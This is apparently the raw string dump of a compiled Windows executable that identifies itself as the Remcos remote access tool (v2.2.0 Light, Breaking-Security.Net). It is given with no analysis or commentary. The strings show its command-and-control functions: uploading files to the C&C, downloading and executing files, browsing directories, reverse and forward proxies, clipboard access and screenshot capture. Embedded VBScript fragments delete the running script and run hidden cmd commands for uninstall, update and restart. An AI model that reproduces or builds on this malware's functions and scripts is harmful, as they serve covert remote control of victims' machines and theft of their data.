!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
tl9~<tg
^@v 8^9
F@;F<r
8^9uu8
t3Jt(Jt Jt
Bt'Husj
YSSShT
SSSh-U@
;0u!SSS
;0u!SSS
YYPShX
YYPShH
OOtkOtKOOt$O
[<3u1S
YSSSSSSSj
PSVWht
t VVVj
[DataStart]
%02i:%02i:%02i:%03i [INFO]
KeepAlive Enabled! Timeout: %i seconds
KeepAlive Timeout changed to %i
[INFO]
KeepAlive disabled
%02i:%02i:%02i:%03i [KeepAlive]
Timeout expired, resetting connection.
CloseChat
GetMessage
DisplayMessage
invalid vector<T> subscript
SystemDrive
cmd.exe
Uploading file to C&C:
Unable to rename file!
Unable to delete:
Deleted file:
Failed to download file:
Downloaded file:
Downloading file:
[ERROR]
Failed to upload file:
Uploaded file:
Executing file:
Browsing directory:
FunFunc
exepath
licence
(32 bit)
(64 bit)
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
Software\
licence_code.txt
SetProcessDEPPolicy
Shell32
IsUserAnAdmin
GetComputerNameExW
IsWow64Process
kernel32
kernel32.dll
GlobalMemoryStatusEx
GetModuleFileNameExW
Kernel32.dll
Psapi.dll
GetModuleFileNameExA
SETTINGS
2.2.0 Light
override
GetDirectListeningPort
StopReverse
StopForward
StartReverse
StartForward
fwdsocks
[regsplt]
Shlwapi.dll
SHDeleteKeyW
Disconnected!
Connected to
gethostbyname error
Connecting to
PowrProf.dll
SetSuspendState
subsplt
wndsplt
SeShutdownPrivilege
User32.dll
GetCursorInfo
DISPLAY
GetLastInputInfo
%02i:%02i:%02i:%03i
GetSystemTimes
Software\Microsoft\Windows\CurrentVersion\Uninstall
TileWallpaper
WallpaperStyle
Control Panel\Desktop
Remcos
GetConsoleWindow
MsgWindowClass
* Breaking-Security.Net
* REMCOS v
CONOUT$
CreateThread
CloseHandle
WaitForSingleObject
CreateEventA
GetLocalTime
HeapFree
HeapCreate
SetEvent
TerminateProcess
WriteFile
ReadFile
PeekNamedPipe
CreateProcessA
CreatePipe
FindNextFileW
FindFirstFileW
lstrlenA
GetDriveTypeA
SetFilePointer
GetFileSize
CreateFileW
CreateDirectoryW
DeleteFileW
GetFileAttributesW
GetLogicalDriveStringsA
ExitThread
FindClose
TerminateThread
MapViewOfFileEx
CreateFileMappingA
GetProcAddress
LoadLibraryA
SetFileAttributesW
GetModuleFileNameW
GetLongPathNameW
GetLastError
CreateMutexA
GetModuleHandleA
SizeofResource
LockResource
LoadResource
FindResourceA
GetLocaleInfoA
Process32NextW
Process32FirstW
CreateToolhelp32Snapshot
GetTickCount
GlobalUnlock
GlobalLock
GlobalAlloc
GetCurrentProcessId
GetCurrentProcess
DeleteFileA
GlobalFree
LocalAlloc
OpenProcess
DuplicateHandle
GetCurrentThread
RemoveDirectoryW
lstrcpynA
GetModuleFileNameA
ExitProcess
AllocConsole
KERNEL32.dll
DispatchMessageA
TranslateMessage
GetMessageA
SetWindowTextW
GetClipboardData
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
ExitWindowsEx
MessageBoxW
GetWindowThreadProcessId
ShowWindow
CloseWindow
IsWindowVisible
GetWindowTextW
EnumWindows
DrawIcon
GetIconInfo
SendInput
GetForegroundWindow
SystemParametersInfoW
CreateWindowExA
RegisterClassExA
AppendMenuA
CreatePopupMenu
TrackPopupMenu
SetForegroundWindow
GetCursorPos
DefWindowProcA
USER32.dll
GetDIBits
GetObjectA
StretchBlt
SelectObject
DeleteObject
DeleteDC
CreateCompatibleBitmap
GetDeviceCaps
CreateCompatibleDC
CreateDCA
GDI32.dll
RegDeleteKeyA
RegOpenKeyExA
RegCloseKey
RegQueryValueExA
RegQueryValueExW
RegOpenKeyExW
RegSetValueExA
RegCreateKeyA
RegSetValueExW
RegCreateKeyW
RegDeleteValueW
RegEnumValueW
RegEnumKeyExW
RegQueryInfoKeyW
RegCreateKeyExW
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
CloseServiceHandle
QueryServiceConfigW
OpenServiceW
EnumServicesStatusW
OpenSCManagerA
StartServiceW
OpenSCManagerW
ControlService
QueryServiceStatus
ChangeServiceConfigW
GetUserNameW
RegEnumKeyExA
ADVAPI32.dll
ShellExecuteW
ShellExecuteExA
Shell_NotifyIconA
ExtractIconA
SHELL32.dll
malloc
strncmp
printf
??0exception@@QAE@ABV0@@Z
_CxxThrowException
??3@YAXPAX@Z
getenv
??2@YAPAXI@Z
_wrename
wcscmp
tolower
__CxxFrameHandler
_wgetenv
wcslen
wcscpy
sprintf
_wsystem
wcscat
freopen
__dllonexit
_onexit
MSVCRT.dll
??1type_info@@UAE@XZ
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z
??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z
?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z
?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ
??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ
??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z
??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ
?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
??0logic_error@std@@QAE@ABV01@@Z
??0out_of_range@std@@QAE@ABV01@@Z
??1out_of_range@std@@UAE@XZ
??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z
??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z
??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z
??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z
??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z
?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z
??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z
??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z
??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z
??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z
??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z
?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z
?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z
?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB
?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z
?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ
??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z
?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z
?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z
?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z
?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ
?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ
??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z
??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z
??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z
??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z
??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z
??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z
??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ
?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ
??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z
??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z
?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z
?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z
??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z
?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z
?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z
?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ
?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z
?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z
?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ
MSVCP60.dll
StrToIntA
SHLWAPI.dll
WS2_32.dll
URLDownloadToFileW
urlmon.dll
GdipGetImageEncodersSize
GdipGetImageEncoders
GdiplusStartup
GdipLoadImageFromStream
GdipLoadImageFromStreamICM
GdipFree
GdipDisposeImage
GdipCloneImage
GdipAlloc
GdipSaveImageToStream
gdiplus.dll
InternetCloseHandle
InternetReadFile
InternetOpenUrlA
InternetOpenA
WININET.dll
GetStartupInfoA
.?AVexception@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
wxxxxxxxxyuvvzzututtsrq^
69D8H;6
&:;BMM-
L?H0HAH
FOO?M`'
'KLKBNa
(J>2<3<
khijjjjjjjjjjjjjjjjjjjjjhl
mnggggggggggggggggggggggnm
@)PW3+v>
\FC/x1
wCaeU|
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
0)0/0E0L0S0_0e0o0
0;1Q1z1
2$2E2g2p2
3%32373=3O3T3e3o3x3
4&484F4\4b4
5*545>5N5X5l5u5~5
6(6.646I6P6\6e6m6|6
7I7O7]7c7
8&8/8S8^8j8
9"919O9X9a9h9y9
:#:0:>:H:e:{:
<H<O<V<b<h<t<}<
="='=/=5=;=@=E=K=U=_=o=t=y=
> >;>U>]>r>{>
> ?6?K?R?c?i?
0#00080@0L0U0a0g0l0w0
2:2Q2Y2j2q2~2
3"3)373@3e3j3p3{3
4-424;4S4
5"525<5E5W5b5k5
60696B6}6
7"7+7U7
9 9+949=9I9U9a9m9y9
:':8:T:g:w:
;);2;;;F;U;
< <&<:<F<r<x<
?)?;?B?{?
0N0`0f0z0
1,1>1D1l1
2-262v2
303C3L3U3
4*4?4P4Y4f4j4n4r4v4z4~4
6 686T6n6{6
757M7g7m7y7
7M8Y8l8
9;9B9S9[9`9|9
: :8:W:
;,;6;?;R;
232K2f2m2~2
373@3[3b3i3u3{3
4C4O4X4j4p4x4
5.5:5@5I5[5i5z5
6&6/6>6G6g6p6y6~6
7>7F7N7T7r7w7
8"8B8K8T8]8b8v8|8
9!9'909>9G9x9
:":6:?:H:[:`:f:
:-;6;?;H;Q;Z;_;h;r;|;
<#<0<:<T<Z<d<j<u<
=(=>=E=W=a=j=
>6>=>D>P>V>l>s>z>
?"?1?B?Z?
030:0C0L0Z0c0k0u0{0
1$1*131D1R1_1m1z1
2$262J2Q2Z2c2
4#4*4/474@4E4N4S4]4b4g4r4x4
5 575A5N5V5
6)6<6L6R6[6m6
8#8,888A8M8V8_8k8w8
;+;;;K;i;r;{;
< <><E<\<u<
>K>h>q>
?3?O?Z?
0#0.0M0\0j0}0
2$20262L2S2Z2f2l2
434E4K4d4k4t4
5 5+575T5\5t5
656<6D6Q6W6]6o6
7&7/787D7I7N7U7[7a7f7k7r7x7~7
9%9-989O9m9s9z9
:2:R:n:
;*;L;d;
<7<<<B<I<Q<W<o<~<
= =<=L=R=Y=
>4>J>k>}>
?'?C?S?c?y?
0%03090M0d0i0{0
1*161A1P1h1n1|1
2$2,232^2q2
3$3,3=3B3J3S3e3j3p3
4G7\7h7t7
8(848@8L8X8d8p8|8
9$909<9H9T9`9l9x9
:!:1:8:F:o:x:
<%<,<[<k<
=(=;=H=N=U=d=t=
>#>*>X>h>q>
?@?G?c?i?q?
070K0Q0}0
1!1,1N1j1~1
2+2M2T2|2
3)303:3_3f3p3z3
4!4J4U4^4l4r4y4
6=6N6i6
878R8[8r8
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
96:O:c:
;&;7;=;B;I;R;_;n;~;
<.<7<@<e<n<
=!=*=8=>=H=N=U=_=d=j=~=
1,12181>1b1k1x1
2+242=2D2X2^2r2x2
363L3e3n3
4"41464<4C4H4_4f4m4y4
5.595I5l5w5
717=7C7
9&9,93989O9Y9^9o9
97:U:x:
:&;2;H;d;t;};
=&=G=U=h={=
>">6>?>
0!0<0C0J0V0\0n0t0y0
1%1,1=1G1P1X1a1p1
1O2_2k2
213A3M3
6 6Q6g6
7)7U7a7m7y7
868B8N8V8d8
9(909=9H9Q9b9~9
:,:;:M:[:w:
;);B;O;W;d;
<%<.<7<o<v<
=4=L=_=e=
=">'>->4>O>
1&1,1D1R1^1n1
2 2)222<2F2\2e2
383Z3n3w3
4+424I4S4\4q4~4
5/5:5a5v5
656W6m6
7#767}7
8,8D8N8b8
9,9@9Q9b9s9
; ;);2;;;D;P;Y;
<'<-<2<7<b<h<m<r<
0(0.080=0C0J0O0p0z0
0 1F1U1p1z1
2"2,22282>2K2S2[2c2h2r2x2
3A3o3|3
535:5A5H5N5V5\5c5j5u5|5
6.6>6^6d6j6p6v6
7 7&7,72787>7D7J7P7V7]7i7
0 080P0d0t0x0
1$141@1H1x1
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1$10181
cfso.DeleteFile(Wscript.ScriptFullName)
fso.DeleteFolder "
fso.DeleteFile "
while fso.FileExists("
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
\uninstall.vbs
hCreateObject("WScript.Shell").Run "cmd /c ""
""", 0
\update.vbs
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
\restart.vbs
UserProfile
AppData
ProgramFiles
\SysWOW64
\system32
WinDir
SystemDrive
tpth_unenc
dxdiag
\sysinfo.txt
Yimage/jpeg
UninstallString
InstallDate
InstallLocation
DisplayVersion
Publisher
DisplayName
SETTINGS
/-P?pR